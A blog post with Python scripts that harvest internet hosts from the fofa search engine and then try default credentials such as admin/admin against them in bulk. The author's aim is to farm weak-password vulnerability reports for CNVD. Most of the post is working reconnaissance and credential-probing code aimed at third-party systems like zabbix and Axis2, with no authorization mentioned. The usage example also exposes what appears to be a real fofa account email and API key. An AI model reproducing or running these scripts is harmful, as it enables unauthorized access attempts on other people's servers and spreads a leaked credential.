
Writing a Python3 Weak-Password Probe

2020-04-24  CSeroad

Preface

Recently I needed to submit CNVD vulnerabilities in bulk, but I only had a scattered handful on hand and time was tight. Generic vulnerabilities do appear online every day, but they have likely already been farmed, and frankly I am lazy and did not want to chase anything complicated. So I turned to weak passwords.

Farming weak passwords

To be precise, this means farming the default passwords of certain systems, the less common ones that administrators generally never change, rather than the usual admin-panel login passwords. So where do these targets come from? From fofa.

Calling the fofa API with python3

For a regular member, the fofa API only returns 100 records.
Here zabbix is used as the example.
Code overview:
First take the fofa API URL (fofa_api) and open it with requests.get. The JSON response is converted to a dict with json.loads, and each result is assembled into a URL. BeautifulSoup then fetches each page's title, which is matched against vuln_title with a simple regex; URLs whose title matches are saved to a text file named after that title.
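For reference, the parsing below assumes the API responds with JSON whose results entries hold the host and port at fixed indexes. A rough sketch of that shape (not an exact fofa response; the field order depends on the fields your account returns):

example_response = {
    "results": [
        ["example.com", "203.0.113.10", "8080"],
        ["test.example.org", "203.0.113.11", "443"]
    ]
}
# vullist[1] is used as the host/IP and vullist[2] as the port in the script below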

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# code by CSeroad

import requests
import sys
import re
from bs4 import BeautifulSoup
import json
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def save_result(filename,url):
    with open(filename,'a+') as f:
        f.write(str(url)+'\n')

def vulwebsearch(api_url,vuln_title):
    response = requests.get(url=api_url)
    restring = response.text
    resdict = json.loads(restring)
    vulhostlist = resdict['results']
    for vullist in vulhostlist:
        host = vullist[1]
        port = vullist[2]
        if port == '443':
            base_url = 'https://'+host
        else:
            base_url = 'http://'+host+':'+port
        vuln_url = base_url
        print(vuln_url)
        fofa_spider(vuln_url,vuln_title)

def fofa_spider(vuln_url,vuln_title):
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"}
    url = vuln_url
    try:
        # Fetch the page, extract its <title>, and keep URLs whose title matches vuln_title
        response = requests.get(url=url,headers=headers,timeout=3,verify=False).text
        soup = BeautifulSoup(response,'lxml')
        title = soup.title.string
        if re.search('.*'+vuln_title+'.*', title, re.IGNORECASE):
            print("%-27s %-30s\n" % (url,title))
            filename = title+'.txt'
            save_result(filename,url)
    except Exception as e:
        pass

if __name__=="__main__":
    if(len(sys.argv) == 3):
        api_url = sys.argv[1]
        vuln_title = sys.argv[2]
        vuln_title = vuln_title.strip()
        vulwebsearch(api_url,vuln_title)
    else:
        print('Usage:fofa_api_title.py fofa_api vuln_title')

Usage:

python3 fofa_api_title.py "https://fofa.so/api/v1/search/all?email=lvxy@starso.cn&key=a592d4b70d1122bebbbb8c285c318b3e&qbase64=emFiYml4" "zabbix"

Just pass in the fofa API URL and the title string to match.
Note that both arguments should be quoted on the command line.
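For reference, the qbase64 value in the API URL is just the Base64-encoded fofa query (emFiYml4 decodes to zabbix). A minimal sketch of building the API URL, mirroring how the crawler script below encodes the query; YOUR_EMAIL and YOUR_KEY are placeholders for your own account:

# Sketch: build the qbase64 parameter and API URL (YOUR_EMAIL/YOUR_KEY are placeholders)
import base64
from urllib.parse import quote

query = 'zabbix'
qbase64 = quote(base64.b64encode(query.encode('utf-8')),'utf-8')   # -> emFiYml4
api_url = 'https://fofa.so/api/v1/search/all?email=YOUR_EMAIL&key=YOUR_KEY&qbase64='+qbase64
print(api_url)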
Sample runs against zabbix and against Axis2 print the matched URLs and titles (result screenshots omitted).

Crawling fofa pages with python3

Because the fofa API returns only 100 records, and after filtering by title the hosts left for manual weak-password testing are even fewer, I went a step further and crawled fofa's result pages to collect more data.
The annoying part is that fofa has anti-crawling measures, so multi-threading helps far less than it should; in testing, crawling about 10 pages takes roughly 40 seconds (two batches of 5 pages, each followed by a 20-second sleep). Still faster than doing it by hand.
Code overview:
1. Use the threading module with 5 threads, i.e. crawl 5 pages at a time, then sleep for 20 seconds before starting the next 5 pages. Crawled URLs are appended to result_fofa.txt as they come in, so the run can be interrupted at any time;
2. --title can be omitted, in which case only the crawled results are saved to the output file;
3. With --title, the crawled result_fofa.txt is filtered again by page title, which partly overlaps with what fofa's own query syntax can do;

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# code by CSeroad

import requests
import base64
import re
from optparse import OptionParser
from bs4 import BeautifulSoup
from urllib.parse import quote,unquote
import threading
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

banner = '''
  ____ ____                           _
 / ___/ ___|  ___ _ __ ___   __ _  __| |
| |   \___ \ / _ \ '__/ _ \ / _` |/ _` |
| |___ ___) |  __/ | | (_) | (_| | (_| |
 \____|____/ \___|_|  \___/ \__,_|\__,_|

'''

def save_fofa_result(filename,url_list):
    for url in url_list:
        with open(filename,'a+') as f:
            f.write(str(url)+'\n')


def save_vuln_result(filename,vuln_url):
    with open(filename,'a+') as f:
        f.write(str(vuln_url)+'\n')

def getinfo(page,result_filename):
    print("当前第"+str(page)+"页")
    try:
        response = requests.get("https://fofa.so/result?full=true&page="+str(page)+"&qbase64="+str(qbase64),headers=headers)
        findurl = re.findall('<a target="_blank" href="(.*)">.* <i class="fa fa-link">',response.text)
        print(findurl)
        save_fofa_result(result_filename,findurl)
    except Exception as e:
        print(e)

# Use 5 threads to request 5 pages at the same time
def thread(page,result_filename):
    thread_list = []
    for threads in range(1,6):
        page += 1
        t = threading.Thread(target=getinfo,args=(page,result_filename))
        thread_list.append(t)
    for t in thread_list:
        t.start()
    for t in thread_list:
        t.join()

def url_title(vuln_title,result_filename):
    print("\033[1;37;40m"+'您要检索的titl为:'+vuln_title+"\033[0m")
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"}
    f = open(result_filename, "r")
    for line in f:
        vuln_url = line.strip()
        try:
            response = requests.get(url=vuln_url,headers=headers,timeout=3,verify=False).text
            soup = BeautifulSoup(response,'lxml')
            title = soup.title.string
            #print("%-27s %-30s\n" % (vuln_url,title))所有title
            if re.search('.*'+vuln_title+'.*', title, re.IGNORECASE):
                print("%-27s %-30s\n" % (vuln_url,title))
                vuln_name = vuln_title+'_title.txt'
                save_vuln_result(vuln_name,vuln_url)
        except Exception as e:
            pass

def spider_pagenum(keyword):
    global qbase64
    qbase64 = quote(base64.b64encode(keyword.encode('utf-8')),'utf-8')
    print("\033[1;37;40m"+'您要检索的内容为:'+keyword+"\033[0m")
    pageurl = requests.get('https://fofa.so/result?qbase64='+qbase64,headers=headers)
    pagenum = re.findall('>(\d*)</a> <a class="next_page" rel="next"',pageurl.text)
    cookie_auto = re.findall(r'.*email.*@.*[com,cn,net]{1,3}',pageurl.text)
    # 验证cookie是否正确
    if pagenum and cookie_auto:
        pagenum = pagenum[0]
        print("\033[1;37;40m"+'经探测一共'+str(pagenum)+'页数据'+"\033[0m")
    else:
        print("\033[1;31;40m"+'cookie错误或fofa语法错误'+"\033[0m")
        exit()

if __name__ == '__main__':
    print(banner)
    parser = OptionParser("fofa_get_title.py --cookie cookie --search keyword --pagenums num --out result_fofa.txt --title title")
    parser.add_option("--cookie",action="store",type="string",dest="cookie",help="your fofa cookie")
    parser.add_option("--search",action="store",type="string",dest="keyword",help="fofa query syntax")
    parser.add_option("--pagenums",action="store",type="int",dest="pagenums",default=10,help="number of pages to crawl, default 10")
    parser.add_option("--out",action="store",type="string",dest="resultfilename",default="result_fofa.txt",help="file to save crawled URLs to, default result_fofa.txt")
    parser.add_option("--title",action="store",type="string",dest="vuln_title",help="title string to match")
    (options, args) = parser.parse_args()
    if options.cookie and options.keyword:
        t1 = time.time()
        cookie = options.cookie
        keyword = options.keyword
        keyword = keyword.strip()
        headers = {
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",
        "Cookie":cookie
        }
        try:
            spider_pagenum(keyword)
            pagenums = options.pagenums
            result_filename = options.resultfilename
            print("\033[1;37;40m"+'您现在选择爬取:'+str(pagenums)+'页'+"\033[0m")
            for page in range(0,pagenums,5):
                thread(page,result_filename)
                time.sleep(20)
            print("\033[1;37;40m"+'已保存到\t>>>>>>\t'+result_filename+'文件'+"\033[0m")
            print('end time:',time.time()-t1)
            if options.vuln_title:
                vuln_title = options.vuln_title
                url_title(vuln_title,result_filename)
                print("\033[1;37;40m"+'已保存到\t>>>>>>\t'+vuln_title+'_title.txt文件'+"\033[0m")
            else:
                print("\033[1;31;40m"+'您没有输入--title参数,只爬取了'+str(pagenums)+'页'+"\033[0m")
        except Exception as e:
            print(e)
    else:
        parser.error('incorrect number of arguments')

Usage

python3 fofa_get_title.py --cookie=cookie --search=keyword --pagenums=num --out=result_fofa.txt --title=title

Parameters

--cookie   your fofa cookie
--search   fofa query syntax
--pagenums number of pages to crawl, default 10
--out      output file, default result_fofa.txt
--title    title string to match in the crawled results
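A concrete invocation might look like the following (the cookie value and fofa query are placeholders; quote the fofa syntax so the shell passes it through intact):

python3 fofa_get_title.py --cookie='YOUR_FOFA_COOKIE' --search='app="zabbix"' --pagenums=10 --out=result_fofa.txt --title='zabbix'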

Sample run (screenshots omitted).

The next step is to manually probe the collected URLs for weak passwords. Of course, this could be taken further with a script that scans for weak passwords in bulk, as sketched below.
Time is limited though, and submitting the vulnerabilities is the more urgent task.
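As a rough illustration of that follow-up step (not part of the scripts above), a bulk check could read the saved URLs and try a small dictionary of default credentials over HTTP Basic auth. The file name and credential pairs below are made-up examples, and services with form-based logins (zabbix included) would need the request adapted per service:

# A minimal sketch of bulk default-credential probing (illustrative only)
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Example credential pairs; replace with your own collected default passwords
default_creds = [('admin','admin'),('admin','123456'),('root','root')]

def check_weak_basic_auth(url_file):
    with open(url_file) as f:
        for line in f:
            url = line.strip()
            for user,password in default_creds:
                try:
                    # A 200 response with Basic auth suggests the credentials were accepted
                    r = requests.get(url,auth=(user,password),timeout=3,verify=False)
                    if r.status_code == 200:
                        print("%-27s %s/%s" % (url,user,password))
                        break
                except Exception:
                    pass

if __name__ == '__main__':
    check_weak_basic_auth('zabbix_title.txt')   # file name is an example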

This script can be used to farm default passwords for many different services. Below is the list of service default passwords collected this week (screenshot omitted).
There is plenty of time to keep collecting more~


Summary

Writing a bit of code feels good.
